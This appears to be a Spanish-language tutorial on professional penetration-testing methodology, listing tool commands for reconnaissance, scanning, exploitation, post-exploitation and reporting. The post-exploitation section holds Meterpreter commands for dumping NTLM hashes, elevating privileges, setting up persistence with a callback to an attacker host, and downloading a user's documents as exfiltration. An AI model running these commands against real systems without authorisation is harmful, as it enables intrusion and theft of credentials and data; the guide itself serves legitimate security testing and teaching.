← Volver al inicio
Pentesting Metodología PTES OSSTMM Fases

Metodología de Pentesting

20/03/2022

Guía completa de la metodología de pentesting profesional: fases, herramientas por fase y entregables, basada en PTES (Penetration Testing Execution Standard) y OWASP.

Fases del pentesting

Fase 1 — Reconocimiento Pasivo (OSINT)

Recopilar información sin interactuar directamente con el objetivo.

# Herramientas:
# WHOIS:
whois target.com

# DNS enumeration:
dig target.com ANY
nslookup -type=MX target.com
dnsenum target.com

# Subdominios:
sublist3r -d target.com
amass enum -d target.com

# Búsqueda de emails:
theHarvester -d target.com -b google,linkedin

# Google Dorks:
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com "index of"

# Shodan:
shodan search hostname:target.com

# LinkedIn / redes sociales:
# Identificar empleados, tecnologías usadas, etc.

Fase 2 — Reconocimiento Activo

Interacción directa con los sistemas objetivo.

# Escaneo de hosts activos:
nmap -sn 192.168.1.0/24

# Escaneo de puertos y servicios:
nmap -sS -sV -O -p- 192.168.1.10 -oA fase2_nmap

# Enumeración web:
gobuster dir -u http://target.com -w big.txt -x php,html,txt
nikto -h http://target.com

Fase 3 — Análisis de Vulnerabilidades

# Escáner de vulnerabilidades:
nmap --script vuln 192.168.1.10
openvas (herramienta gráfica)

# Búsqueda de exploits:
searchsploit apache 2.4
searchsploit -x path/to/exploit   # Ver el exploit

# Base de datos de CVEs:
# https://nvd.nist.gov/
# https://www.exploit-db.com/

Fase 4 — Explotación

# Framework de explotación:
msfconsole
use exploit/[módulo]
set RHOSTS [IP]
set PAYLOAD [payload]
exploit

# Exploits manuales (desde Exploit-DB o GitHub):
python3 exploit.py --target 192.168.1.10

# SQLMap, Hydra, Burp Suite (según servicio atacado)

Fase 5 — Post-explotación

# En Meterpreter:
sysinfo           # Info del sistema
getuid            # Usuario actual
getsystem         # Elevar privilegios
hashdump          # Extraer hashes NTLM

# Mantener acceso (persistencia):
run persistence -S -i 30 -p 4444 -r 192.168.1.5

# Movimiento lateral:
# Crackear hashes → usar credenciales en otros sistemas
# Pass-the-Hash: usar hash NTLM directamente

# Exfiltración de datos:
download C:\Users\Admin\Documents\ /tmp/exfil/

Fase 6 — Reporte

El informe de pentesting debe incluir:

Clasificación CVSS de vulnerabilidades

ScoreSeveridadAcción
9.0 – 10.0CríticaRemediar inmediatamente
7.0 – 8.9AltaRemediar en menos de 7 días
4.0 – 6.9MediaRemediar en menos de 30 días
0.1 – 3.9BajaRemediar en el siguiente ciclo